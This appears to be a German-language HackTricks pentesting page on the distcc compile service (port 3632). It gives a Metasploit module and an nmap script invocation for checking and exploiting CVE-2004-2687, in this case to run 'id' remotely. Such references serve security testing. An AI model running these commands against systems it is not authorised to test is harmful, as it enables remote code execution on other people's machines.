hacktricks/network-services-pentesting/3632-pentesting-distcc.md
2024-02-10 15:36:32 +00:00

3.6 KiB

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Grundlegende Informationen

Distcc ist ein Tool, das den Kompilierungsprozess verbessert, indem es die unbenutzte Rechenleistung anderer Computer im Netzwerk nutzt. Wenn Distcc auf einem Rechner eingerichtet ist, kann dieser Rechner seine Kompilierungsaufgaben an ein anderes System verteilen. Dieses Empfängersystem muss den Distccd-Daemon ausführen und einen kompatiblen Compiler installiert haben, um den gesendeten Code zu verarbeiten.

Standardport: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Ausnutzung

Überprüfen Sie, ob es anfällig für CVE-2004-2687 ist, um beliebigen Code auszuführen:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Ich glaube nicht, dass Shodan diesen Dienst erkennt.

Ressourcen

Von Álex B (@r1p) erstellter Beitrag

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: